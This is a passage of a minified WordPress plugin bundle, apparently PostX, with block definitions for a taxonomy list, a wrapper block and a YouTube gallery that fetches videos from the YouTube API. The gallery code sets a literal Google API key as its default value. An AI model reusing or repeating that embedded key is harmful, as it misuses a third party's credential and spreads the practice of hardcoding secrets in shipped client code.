}"}]},counterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:"22",unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"400",decoration:"none",family:""},style:[{selector:"{{ULTP}} .ultp-block-item .ultp-taxonomy-count"}]},counterColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-block-item .ultp-taxonomy-count { color:{{counterColor}}; }"}]},counterBgColor:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Base_1_color)"},style:[{selector:"{{ULTP}} .ultp-block-item .ultp-taxonomy-count"}]},counterWidth:{type:"string",default:"24",style:[{selector:"{{ULTP}} .ultp-block-item .ultp-taxonomy-count { max-width:{{counterWidth}}px; width: 100% }"}]},counterHeight:{type:"string",default:"24",style:[{selector:"{{ULTP}} .ultp-block-item .ultp-taxonomy-count { height:{{counterHeight}}px; line-height:{{counterHeight}}px !important; }"}]},counterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-item .ultp-taxonomy-count"}]},counterRadius:{type:"object",default:{lg:{top:"22",right:"22",bottom:"22",left:"22",unit:"px"},unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-item .ultp-taxonomy-count { border-radius:{{counterRadius}}; }"}]},separatorShow:{type:"boolean",default:!1,depends:[{key:"taxGridEn",condition:"!=",value:!0}]},septColor:{type:"string",default:"var(--postx_preset_Base_3_color)",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:last-of-type) { border-bottom-color:{{septColor}}; }"}]},septStyle:{type:"string",default:"solid",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:last-of-type) { border-bottom-style:{{septStyle}}; }"}]},septSize:{type:"string",default:{lg:"1"},style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:last-of-type) { border-bottom-width: {{septSize}}px; }"}]},septSpace:{type:"object",default:{lg:"5"},style:[{depends:[{key:"taxGridEn",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:last-of-type) { padding-bottom: {{septSpace}}px; }  \n          {{ULTP}} .ultp-block-item:not(:last-of-type) { margin-bottom: {{septSpace}}px; }"}]},headingText:{type:"string",default:"Post Taxonomy"},...(0,o.t)(["advanceAttr","heading"],["loadingColor"]),V4_1_0_CompCheck:a.O}},36653:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(43239),n=l(60816),r=l(34433);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks,p=(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/taxonomy-1/","block_docs");s(r,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/ultp-taxonomy.svg"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Listing your Taxonomy in grid / list view.","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:p,rel:"noreferrer"},__("Documentation","ultimate-post"))),attributes:n.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/taxonomy.svg"}},edit:i.Z,save:()=>null})},45478:(e,t,l)=>{"use strict";l.d(t,{Z:()=>y});var o=l(67294),a=l(53049),i=l(99838),n=l(92637);const{__}=wp.i18n,{InspectorControls:r,InnerBlocks:s,useBlockProps:p}=wp.blockEditor,{useState:c,useEffect:u,Fragment:d}=wp.element,{getBlockAttributes:m,getBlockRootClientId:g}=wp.data.select("core/block-editor");function y(e){const[t,l]=c("Content"),{setAttributes:y,className:b,clientId:v,name:h,attributes:f,attributes:{blockId:k,currentPostId:w,previewImg:x,advanceId:T}}=e;u((()=>{const e=v.substr(0,6),t=m(g(v));(0,a.qi)(y,t,w,v),k?k&&k!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||y({blockId:e})):y({blockId:e})}),[v]);const _={setAttributes:y,name:h,attributes:f,setSection:l,section:t,clientId:v};let C;if(k&&(C=(0,i.Kh)(f,"ultimate-post/wrapper",k,(0,a.k0)())),x)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:x});const E=p({...T&&{id:T},className:`ultp-block-${k} ${b}`});return(0,o.createElement)(d,null,(0,o.createElement)(r,null,(0,o.createElement)(n.Sections,null,(0,o.createElement)(n.Section,{slug:"setting",title:__("Style","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:_})),(0,o.createElement)(n.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.Mg,{store:_}),(0,o.createElement)(a.iv,{store:_}))),(0,a.dH)()),(0,o.createElement)("div",E,C&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:C}}),(0,o.createElement)("div",{className:"ultp-wrapper-block"},(0,o.createElement)(s,{templateLock:!1}))))}},33453:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294);const{Component:a}=wp.element,{InnerBlocks:i,useBlockProps:n}=wp.blockEditor;function r(e){const{blockId:t,advanceId:l}=e.attributes,a=n.save({...l&&{id:l},className:`ultp-block-${t}`});return(0,o.createElement)("div",a,(0,o.createElement)("div",{className:"ultp-wrapper-block"},(0,o.createElement)(i.Content,null)))}},38023:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},advanceId:{type:"string",default:""},...(0,l(92165).t)(["advanceAttr"],["loadingColor","advanceId"],[{key:"wrapBg",default:{openColor:1,type:"color",color:"var(--postx_preset_Base_2_color)"},style:[{selector:"{{ULTP}} .ultp-wrapper-block"}]},{key:"wrapBorder",style:[{selector:"{{ULTP}} .ultp-wrapper-block"}]},{key:"wrapShadow",style:[{selector:"{{ULTP}} .ultp-wrapper-block"}]},{key:"wrapRadius",style:[{selector:"{{ULTP}} .ultp-wrapper-block { border-radius:{{wrapRadius}}; }"}]},{key:"wrapHoverBackground",style:[{selector:"{{ULTP}} .ultp-wrapper-block:hover"}]},{key:"wrapHoverBorder",style:[{selector:"{{ULTP}} .ultp-wrapper-block:hover"}]},{key:"wrapHoverRadius",style:[{selector:"{{ULTP}} .ultp-wrapper-block:hover { border-radius:{{wrapHoverRadius}}; }"}]},{key:"wrapHoverShadow",style:[{selector:"{{ULTP}} .ultp-wrapper-block:hover"}]},{key:"wrapMargin",style:[{selector:"{{ULTP}} .ultp-wrapper-block { margin:{{wrapMargin}}; }"}]},{key:"wrapOuterPadding",default:{lg:{top:"30",bottom:"30",left:"30",right:"30",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-wrapper-block { padding:{{wrapOuterPadding}}; }"}]},{key:"advanceZindex",style:[{selector:"{{ULTP}} .ultp-wrapper-block { padding:{{wrapOuterPadding}}; }"}]}])}},35391:(e,t,l)=>{"use strict";var o=l(67294),a=l(45478),i=l(33453),n=l(38023),r=l(52031);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks;s(r,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/wrapper.svg"}),attributes:n.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/wrapper.svg"}},edit:a.Z,save:i.Z})},93673:(e,t,l)=>{"use strict";l.d(t,{Z:()=>g});var o=l(67294),a=l(53049),i=l(99838),n=l(31760),r=l(68533),s=l(89524);const{getBlockAttributes:p,getBlockRootClientId:c}=wp.data.select("core/block-editor"),{useEffect:u,Fragment:d}=wp.element,{useBlockProps:m}=wp.blockEditor,g=e=>{const{setAttributes:t,name:l,className:g,attributes:y,clientId:b,attributes:{blockId:v,previewImg:h,advanceId:f,currentPostId:k,playlistIdOrUrl:w,youTubeApiKey:x,cacheDuration:T,sortBy:_,galleryLayout:C,videosPerPage:E,showVideoTitle:S,videoTitleLength:P,loadMoreEnable:L,moreButtonLabel:I,autoplay:B,autoplayPlaylist:U,loop:M,mute:A,showPlayerControl:H,hideYoutubeLogo:N,showDescription:j,videoDescriptionLength:Z,imageHeightRatio:O,enableListView:R,displayType:D,enablePopup:z,playIcon:F,galleryColumn:W,columns:V,enableAnimation:G,defaultYoutubeIcon:q,layout:$}}=e;let K;if(u((()=>{const e=b.substr(0,6),l=p(c(b));(0,a.qi)(t,l,k,b),v?v&&v!=e&&(l?.hasOwnProperty("ref")||(0,a.k0)()||l?.hasOwnProperty("theme")||t({blockId:e})):t({blockId:e}),t({className:g})}),[b]),v&&(K=(0,i.Kh)(y,"ultimate-post/youtube-gallery",v,(0,a.k0)())),h)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:h,alt:""});const J={setAttributes:t,name:l,attributes:y,clientId:b},Y={playlistId:w,playlistUrl:w,youTubeApiKey:x,cacheDuration:T,sortBy:_,galleryLayout:$,videosPerPage:E,showVideoTitle:S,videoTitleLength:P,loadMoreEnable:L,moreButtonLabel:I,autoplay:B,autoplayPlaylist:U,loop:M,mute:A,showPlayerControl:H,hideYoutubeLogo:N,showDescription:j,videoDescriptionLength:Z,imageHeightRatio:O,enableListView:R,displayType:D,enablePopup:z,galleryColumn:W,columns:V,playIcon:F,enableAnimation:G,setAttributes:t,defaultYoutubeIcon:q},X=m({...f&&{id:f},className:`ultp-block-${v} ${g}`});return(0,o.createElement)(d,null,(0,o.createElement)(r.Z,{store:J}),(0,o.createElement)(n.Z,{include:[{type:"template"}],store:J}),(0,o.createElement)("div",X,K&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:K}}),(0,o.createElement)("div",{className:"ultp-block-wrapper ultp-ytg-block ultp-wrapper-block"},(0,o.createElement)(s.Z,Y))))}},89524:(e,t,l)=>{"use strict";l.d(t,{Z:()=>g});var o=l(67294),a=l(34774),i=l(83100),n=l(64766),r=l(60307);const{Spinner:s,Placeholder:p}=wp.components,{useState:c,useEffect:u}=wp.element,{__}=wp.i18n,d=({video:e,isActive:t,onClick:l,videoTitleLength:a,showDescription:i,imageHeightRatio:n,videoDescriptionLength:s})=>{const[,p]=c({});return u((()=>{const e=()=>p({});return window.addEventListener("resize",e),()=>window.removeEventListener("resize",e)}),[]),(0,o.createElement)("div",{className:"ultp-ytg-playlist-item "+(t?"active":""),onClick:l},(0,o.createElement)("img",{src:e.thumbnail,alt:e.title,loading:"lazy"}),(0,o.createElement)("div",{className:"ultp-ytg-playlist-item-content"},(0,o.createElement)("div",{className:"ultp-ytg-playlist-item-title"},(0,r.aF)(e.title,a))))},m=({video:e,isPlaying:t,onSelect:l,showVideoTitle:a=!0,showDescription:i=!1,videoTitleLength:s={lg:50,md:50,sm:50},videoDescriptionLength:p={lg:100,md:100,sm:100},autoplay:d=!1,loop:m=!1,mute:g=!1,showPlayerControl:y=!0,hideYoutubeLogo:b=!1,imageHeightRatio:v="16-9",customImgHeight:h=null,playIcon:f,enableAnimation:k,defaultYoutubeIcon:w})=>{const[x,T]=c(!1),[_,C]=c({width:window.innerWidth,height:window.innerHeight}),[E,S]=c(!1);return u((()=>{function e(){C({width:window.innerWidth,height:window.innerHeight})}return window.addEventListener("resize",e),()=>window.removeEventListener("resize",e)}),[]),(0,o.createElement)("div",{className:"ultp-ytg-item"+(t?" active":"")},(0,o.createElement)("div",{className:"ultp-ytg-video "+(E?"loading-active":"")},t?(0,o.createElement)(r.Y7,{video:e,autoplay:d,loop:m,mute:g,showPlayerControl:y,hideYoutubeLogo:b,showVideoTitle:a,showDescription:i,videoTitleLength:s,videoDescriptionLength:p,onlyVideo:!0}):E?(0,o.createElement)("div",{className:"ultp-ytg-loading"},(0,o.createElement)("div",{className:"ytg-loader"})):(0,o.createElement)(o.Fragment,null,(0,o.createElement)("img",{src:e.thumbnail,alt:e.title,loading:"lazy"}),(0,o.createElement)("div",{className:"ultp-ytg-play__icon "+(k?"ytg-icon-animation":""),onClick:()=>{S(!0),setTimeout((()=>{S(!1),l()}),1e3)}},w?(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 28.57  20",focusable:"false"},(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 28.57 20",preserveAspectRatio:"xMidYMid meet"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M27.9727 3.12324C27.6435 1.89323 26.6768 0.926623 25.4468 0.597366C23.2197 2.24288e-07 14.285 0 14.285 0C14.285 0 5.35042 2.24288e-07 3.12323 0.597366C1.89323 0.926623 0.926623 1.89323 0.597366 3.12324C2.24288e-07 5.35042 0 10 0 10C0 10 2.24288e-07 14.6496 0.597366 16.8768C0.926623 18.1068 1.89323 19.0734 3.12323 19.4026C5.35042 20 14.285 20 14.285 20C14.285 20 23.2197 20 25.4468 19.4026C26.6768 19.0734 27.6435 18.1068 27.9727 16.8768C28.5701 14.6496 28.5701 10 28.5701 10C28.5701 10 28.5677 5.35042 27.9727 3.12324Z",fill:"#FF0000"}),(0,o.createElement)("path",{d:"M11.4253 14.2854L18.8477 10.0004L11.4253 5.71533V14.2854Z",fill:"white"})))):n.ZP[f]))),(0,o.createElement)("div",{className:"ultp-ytg-inside"},(0,r.eT)(a,e.title,s,i,e.description,p,e.videoId)))},g=({galleryLayout:e="inline",playlistId:t,playlistUrl:l,youTubeApiKey:n="AIzaSyDfov7YEgMiJgMtNh2WJYF2YC9J7jR4FeM",cacheDuration:s="0",sortBy:p="date",videosPerPage:g={lg:9,md:6,sm:3},showVideoTitle:y=!0,videoTitleLength:b={lg:50,md:50,sm:50},loadMoreEnable:v=!1,moreButtonLabel:h="More Videos",galleryColumn:f={lg:3,md:2,sm:1},autoplay:k=!1,loop:w=!1,mute:x=!1,showPlayerControl:T=!0,hideYoutubeLogo:_=!1,showDescription:C=!0,videoDescriptionLength:E={lg:100,md:100,sm:100},imageHeightRatio:S="16-9",enableListView:P=!1,enablePopup:L=!1,displayType:I="grid",playIcon:B,enableAnimation:U,autoplayPlaylist:M,setAttributes:A,defaultYoutubeIcon:H})=>{const[N,j]=c([]),[Z,O]=c(!1),[R,D]=c(""),[z,F]=c(!0),[W,V]=c(null),[G,q]=c(g.lg||9),[$,K]=c(G),[J,Y]=c(f.lg||3),[X,Q]=c(null),ee=(0,r.v8)(t||l),te=(n&&n.length,wp.data.useSelect((e=>e("core").getEntityRecord("root","site")),[])),le=te?JSON.parse(te["ytvgb-video-gallery"]||"{}").key:"",oe=n||le;if(oe&&oe.length,u((()=>{let e=!0;return async function(){if(!ee)return j([]),void D("Please enter a valid YouTube API Key to load your videos");if(!oe)return j([]),F(!1),void D("Please enter a valid Developer API Key to load your videos");O(!0),D("");let t=ee,l=!1;if(t&&t.startsWith("UC")&&24===t.length&&(l=!0),l)try{t=await(async(e,t)=>{const l=await fetch(`https://www.googleapis.com/youtube/v3/channels?part=contentDetails&id=${e}&key=${t}`),o=await l.json();return o.items?.[0]?.contentDetails?.relatedPlaylists?.uploads||null})(t,oe)}catch(e){return D("Failed to fetch channel uploads playlist."),j([]),void O(!1)}if(!t)return D("Invalid playlist or channel ID."),j([]),void O(!1);const o=`ultp_youtube_gallery_${t}_${oe}_${p}_${S}`,a=parseInt(s,10)||0;let i=null;try{i=JSON.parse(localStorage.getItem(o))}catch(e){i=null}const n=Date.now();if(i&&i.data&&i.timestamp&&a>0&&n-i.timestamp<1e3*a){const t=(0,r.Qc)(i.data,p);e&&(j(t),O(!1))}else try{const e=await fetch(`https://www.googleapis.com/youtube/v3/playlistItems?part=snippet&maxResults=500&playlistId=${t}&key=${oe}`),l=await e.json();if(l.error)D(l.error.message||"Failed to fetch playlist."),j([]);else{let e=(l.items||[]).filter((e=>"Private video"!==e.snippet.title&&"Deleted video"!==e.snippet.title)).map((e=>({videoId:e.snippet.resourceId.videoId,title:e.snippet.title,thumbnail:e.snippet.thumbnails&&e.snippet.thumbnails[S]&&e.snippet.thumbnails[S].url,publishedAt:e.snippet.publishedAt||"",description:e.snippet.description||""}))),t=e;if("title"===p?t=e.slice().sort(((e,t)=>e.title.localeCompare(t.title))):"oldest"===p?t=e.slice().sort(((e,t)=>new Date(e.publishedAt)-new Date(t.publishedAt))):"date"===p||"latest"===p?t=e.slice().sort(((e,t)=>new Date(t.publishedAt)-new Date(e.publishedAt))):"popular"===p&&(t=e.slice().sort(((e,t)=>(t.viewCount||0)-(e.viewCount||0)))),e=t,"popular"===p){const t=e.map((e=>e.videoId)).join(",");try{const l=await fetch(`https://www.googleapis.com/youtube/v3/videos?part=statistics&id=${t}&key=${oe}`),o=await l.json();if(o.items){const t={};o.items.forEach((e=>{t[e.id]=e.statistics.viewCount})),e.forEach((e=>{e.viewCount=parseInt(t[e.videoId]||0)}))}}catch(e){console.warn("Failed to fetch video statistics:",e)}}const i=(0,r.Qc)(e,p);if(j(i),a>0)try{localStorage.setItem(o,JSON.stringify({data:e,timestamp:n}))}catch(e){console.warn("Failed to cache videos:",e)}}}catch(e){console.error("Failed to fetch videos:",e),D("Failed to fetch videos. Please try again.")}finally{O(!1)}}(),()=>{e=!1}}),[ee,oe,p,s,S]),u((()=>{N.length>0&&!X&&Q(N[0])}),[N]),u((()=>{function e(e=!1){const t=window.innerWidth;let l,o;t<600?(l=g.sm||3,o=Number(f.sm)||1):t<900?(l=g.md||6,o=Number(f.md)||2):(l=g.lg||9,o=Number(f.lg)||3),q(l),Y(o),K(v?e?l:e=>Math.max(e,l):N.length)}return e(!0),window.addEventListener("resize",(()=>e(!1))),()=>window.removeEventListener("resize",(()=>e(!1)))}),[g,f,v,N.length]),u((()=>{n&&n.length>0?wp.data.dispatch("core").saveEntityRecord("root","site",{"ytvgb-video-gallery":JSON.stringify({key:n})}):le&&le.length>0&&A({youTubeApiKey:le})}),[n]),Z&&"playlist"!=e)return(0,o.createElement)("div",{className:"ultp-ytg-loading gallery-postx gallery-active"},(0,o.createElement)("div",{className:"skeleton-box"}),(0,o.createElement)("div",{className:"skeleton-box"}),(0,o.createElement)("div",{className:"skeleton-box"}),(0,o.createElement)("div",{className:"skeleton-box"}),(0,o.createElement)("div",{className:"skeleton-box"}),(0,o.createElement)("div",{className:"skeleton-box"}));if(Z&&"playlist"==e)return(0,o.createElement)("div",{className:"ultp-ytg-loading ultp-ytg-playlist-loading"},(0,o.createElement)("div",{className:"ytg-loader"}));const ae=(0,i.Z)("https://wpxpo.com/docs/postx/all-blocks/youtube-gallery-block/","block_docs");return R?(0,o.createElement)("div",{className:"ultp-ytg-error"},R,(0,o.createElement)(a.Z,{value:oe,onChange:e=>{A({youTubeApiKey:e}),wp.data.dispatch("core").saveEntityRecord("root","site",{"ytvgb-video-gallery":JSON.stringify({key:e})})},isTextField:!0,attr:{placeholder:"Enter your YouTube developer API Key",label:"",help:""}}),(0,o.createElement)("div",{className:"ultp-ytg-error-message"},"Need help setting this up? Click"," ",(0,o.createElement)("a",{href:ae,target:"_blank",rel:"noopener noreferrer"},"here"),"for instructions")):0===N.length?null:"playlist"===e?(0,o.createElement)("div",{className:"ultp-ytg-playlist"},(0,o.createElement)("div",{className:"ultp-ytg-container ultp-layout-playlist"},(0,o.createElement)("div",{className:"ultp-ytg-main"},(0,o.createElement)(r.Y7,{video:X,autoplay:"playlist"==e?M:k,loop:w,mute:x,showPlayerControl:T,hideYoutubeLogo:_,showVideoTitle:y,showDescription:C,videoTitleLength:b,defaultYoutubeIcon:H,videoDescriptionLength:E})),(0,o.createElement)("div",{className:"ultp-ytg-playlist-sidebar"},(0,o.createElement)("div",{className:"ultp-ytg-playlist-items"},N.map((e=>(0,o.createElement)(d,{key:e.videoId,video:e,isActive:e.videoId===X?.videoId,imageHeightRatio:S,onClick:()=>Q(e),videoTitleLength:b,showDescription:C,videoDescriptionLength:E}))))))):(0,o.createElement)("div",{className:""},(0,o.createElement)("div",{className:`ultp-ytg-container ultp-layout-${e} ultp-ytg-${I} ${P?"ultp-ytg-view-list":"ultp-ytg-view-grid"} ultp-ytg-${L?"popup":""}`},N.slice(0,$).map((e=>(0,o.createElement)(m,{key:e.videoId,playIcon:B,video:e,isPlaying:W===e.videoId,onSelect:()=>V(e.videoId),showVideoTitle:y,showDescription:C,videoTitleLength:b,videoDescriptionLength:E,autoplay:k,loop:w,mute:x,defaultYoutubeIcon:H,showPlayerControl:T,hideYoutubeLogo:_,enableAnimation:U})))),v&&$<N.length&&(0,o.createElement)("div",{className:"ultp-ytg-loadmore-btn",onClick:()=>{K((e=>e+G))}},h))}},79187:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},advanceId:{type:"string",default:""},sortBy:{type:"string",default:"date"},youTubeApiKey:{type:"string",default:""},playlistIdOrUrl:{type:"string",default:"PLPidnGLSR4qcAwVwIjMo1OVaqXqjUp_s4"},cacheDuration:{type:"string",default:"0"},layout:{type:"string",default:"inline"},galleryColumn:{type:"object",default:{lg:"3",xs:"1",sm:"2"},style:[{depends:[{key:"layout",condition:"!=",value:"playlist"},{key:"layout",condition:"!=",value:"playlist"}],selector:"{{ULTP}} .ultp-ytg-view-grid, {{ULTP}} .ultp-ytg-view-list { display: grid; grid-template-columns: repeat({{galleryColumn}}, minmax(0, 1fr)); }"}]},enablePopup:{type:"boolean",default:!1,style:[{depends:[{key:"layout",condition:"!=",value:"playlist"}]}]},customImgHeight:{type:"object",default:{lg:"250",unit:"px"},style:[{depends:[{key:"layout",condition:"!=",value:"playlist"}],selector:"\n\t\t\t\t{{ULTP}} .ultp-ytg-video img, {{ULTP}} .ultp-ytg-video { height: {{customImgHeight}} !important; }\n\t\t\t\t{{ULTP}} .ultp-ytg-video img { width: 100%; }"}]},customImgHeightLg:{type:"object",default:{lg:"450",unit:"px"},style:[{depends:[{key:"layout",condition:"==",value:"classic"}],selector:"{{ULTP}} .ultp-layout-classic .ultp-ytg-item:first-child .ultp-ytg-video { height: {{customImgHeightLg}} !important; } {{ULTP}} .ultp-ytg-video img { height: 100% !important; width: 100%; }"}]},playlistHeight:{type:"object",default:{lg:"450",xs:"850",unit:"px"},style:[{depends:[{key:"layout",condition:"==",value:"playlist"}],selector:"{{ULTP}} .ultp-layout-playlist { max-height: {{playlistHeight}}; }"}]},enableListView:{type:"boolean",default:!1,style:[{depends:[{key:"layout",condition:"!=",value:"playlist"}]}]},displayType:{type:"string",default:"card",style:[{depends:[{key:"layout",condition:"!=",value:"playlist"},{key:"showDescription",condition:"==",value:!0}]},{depends:[{key:"layout",condition:"!=",value:"playlist"},{key:"showVideoTitle",condition:"==",value:!0}]}]},videosPerPage:{type:"object",default:{lg:6},style:[{depends:[{key:"layout",condition:"!=",value:"playlist"}]}]},imageHeightRatio:{type:"string",default:"maxres"},showVideoTitle:{type:"boolean",default:!0},videoTitleLength:{type:"object",default:{lg:90},style:[{depends:[{key:"showVideoTitle",condition:"==",value:!0}]}]},showDescription:{type:"boolean",default:!1},videoDescriptionLength:{type:"object",default:{lg:146},style:[{depends:[{key:"showDescription",condition:"==",value:!0}]}]},loadMoreEnable:{type:"boolean",default:!0,style:[{depends:[{key:"layout",condition:"!=",value:"playlist"}]}]},moreButtonLabel:{type:"string",default:"More Videos",style:[{depends:[{key:"layout",condition:"!=",value:"playlist"}]}]},autoplay:{type:"boolean",default:!0,style:[{depends:[{key:"layout",condition:"!=",value:"playlist"}]}]},autoplayPlaylist:{type:"boolean",default:!1,style:[{depends:[{key:"layout",condition:"==",value:"playlist"}]}]},loop:{type:"boolean",default:!1},mute:{type:"boolean",default:!1},showPlayerControl:{type:"boolean",default:!0},hideYoutubeLogo:{type:"boolean",default:!1},gutterSpace:{type:"object",default:{lg:16,unit:"px"},style:[{depends:[{key:"layout",condition:"!=",value:"playlist"}],selector:"{{ULTP}} .ultp-ytg-view-grid,\n\t\t\t\t{{ULTP}} .ultp-ytg-view-list { gap: {{gutterSpace}}; }"},{depends:[{key:"layout",condition:"==",value:"playlist"}],selector:"{{ULTP}} .ultp-layout-playlist { gap: {{gutterSpace}}; }"}]},itemBorderRadius:{type:"object",default:{lg:"4",unit:"px"},style:[{selector:"{{ULTP}} .ultp-ytg-video, {{ULTP}} .ultp-ytg-main iframe { border-radius: {{itemBorderRadius}}; overflow: hidden; }"}]},galleryItemBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-ytg-video, {{ULTP}} .ultp-ytg-main iframe"}]},imageSpace:{type:"object",default:{lg:"10",unit:"px"},style:[{selector:"{{ULTP}} .ultp-ytg-content { margin-top: {{imageSpace}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:3,right:3,bottom:0,left:0},color:"#000"},style:[{selector:"{{ULTP}} .ultp-ytg-video"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:3,right:3,bottom:0,left:0},color:"#000"},style:[{selector:"{{ULTP}} .ultp-ytg-item .ultp-ytg-video:hover"}]},imgScale:{type:"string",default:"cover",style:[{depends:[{key:"layout",condition:"!=",value:"playlist"}],selector:"{{ULTP}} .ultp-ytg-item > .ultp-ytg-video > img {object-fit: {{imgScale}};} {{ULTP}} .ultp-ytg-item > .ultp-ytg-video { background-color: #000; }"}]},titleTypography:{type:"object",default:{openTypography:1,weight:"500",size:{lg:18,unit:"px"},height:{lg:26,unit:"px"},decoration:"none",family:""},style:[{selector:"{{ULTP}} .ultp-ytg-title a, {{ULTP}} .ultp-ytg-main .ultp-ytg-title a"}]},titleTypographySmall:{type:"object",default:{openTypography:1,weight:"500",size:{lg:14,unit:"px"},height:{lg:26,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"layout",condition:"==",value:"playlist"}],selector:"{{ULTP}} .ultp-ytg-playlist-item-title"}]},descTypography:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:24,unit:"px"},decoration:"none",family:""},style:[{selector:"{{ULTP}} .ultp-ytg-description"}]},titleColor:{type:"string",default:"",style:[{selector:"\n\t\t\t\t{{ULTP}} .ultp-ytg-title a { color: {{titleColor}} }"}]},titleColorLg:{type:"string",default:"#000",style:[{depends:[{key:"layout",condition:"==",value:"playlist"}],selector:"\n\t\t\t\t{{ULTP}} .ultp-ytg-playlist-item-title { color: {{titleColorLg}} }"}]},titleHoverColor:{type:"string",default:"",style:[{selector:"\n\t\t\t\t{{ULTP}} .ultp-ytg-title a:hover { color: {{titleHoverColor}} }"}]},titleHoverColorSm:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"==",value:"playlist"}],selector:"\n\t\t\t\t{{ULTP}} .ultp-ytg-playlist-item.active .ultp-ytg-playlist-item-title,\n\t\t\t\t{{ULTP}} .ultp-ytg-playlist-item:hover .ultp-ytg-playlist-item-title { color: {{titleHoverColorSm}} }"}]},descColor:{type:"string",default:"#000",style:[{selector:"{{ULTP}} .ultp-ytg-description { color: {{descColor}} }"}]},spaceTop:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"layout",condition:"!=",value:"playlist"},{key:"showDescription",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-ytg-title a, {{ULTP}} .ultp-ytg-playlist-item-title { margin-bottom: {{spaceTop}}; } {{ULTP}} .ultp-ytg-title a { display: block; }"},{depends:[{key:"layout",condition:"==",value:"playlist"},{key:"showDescription",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-ytg-main .ultp-ytg-title a { margin-bottom: {{spaceTop}}; display: block; }"}]},contentBg:{type:"object",default:{openColor:0,type:"color",color:"#eaeaea",gradient:{}},style:[{depends:[{key:"displayType",condition:"==",value:"overlay"},{key:"layout",condition:"!=",value:"playlist"}],selector:"{{ULTP}} .ultp-ytg-content"},{depends:[{key:"layout",condition:"==",value:"playlist"}],selector:"{{ULTP}} .ultp-ytg-playlist-items"}]},singleContentBg:{type:"object",default:{openColor:1,type:"color",color:"#0000000d",gradient:{}},style:[{depends:[{key:"layout",condition:"==",value:"playlist"}],selector:"{{ULTP}} .ultp-ytg-playlist-item.active, {{ULTP}} .ultp-ytg-playlist-item:hover "}]},contentPadding:{type:"object",default:{lg:{top:"16",bottom:"16",left:"16",right:"16",unit:"px"}},style:[{depends:[{key:"displayType",condition:"==",value:"overlay"}],selector:"{{ULTP}} .ultp-ytg-content  { padding: {{contentPadding}}; }"},{depends:[{key:"layout",condition:"==",value:"playlist"},{key:"displayType",condition:"==",value:"overlay"}],selector:"{{ULTP}} .ultp-ytg-playlist-sidebar .ultp-ytg-playlist-items  { padding: {{contentPadding}}; }"}]},contentRadius:{type:"object",default:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},style:[{depends:[{key:"displayType",condition:"==",value:"overlay"}],selector:"{{ULTP}} .ultp-ytg-content { border-radius: {{contentRadius}}; }"},{depends:[{key:"layout",condition:"==",value:"playlist"}],selector:"{{ULTP}} .ultp-ytg-playlist-items { border-radius: {{contentRadius}}; }"}]},defaultYoutubeIcon:{type:"boolean",default:!0},playIcon:{type:"string",default:"youtube_logo_icon_solid",style:[{depends:[{key:"defaultYoutubeIcon",condition:"!=",value:!0}]}]},iconColor:{type:"string",default:"#fff",style:[{depends:[{key:"defaultYoutubeIcon",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-ytg-play__icon { color: {{iconColor}}; }"}]},iconHoverColor:{type:"string",default:"#ffffff",style:[{depends:[{key:"defaultYoutubeIcon",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-ytg-play__icon:hover { color: {{iconHoverColor}}; }"}]},iconSize:{type:"object",default:{lg:40,unit:"px"},style:[{depends:[{key:"layout",condition:"!=",value:"playlist"},{key:"enableAnimation",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-ytg-play__icon svg { height: {{iconSize}}; width: 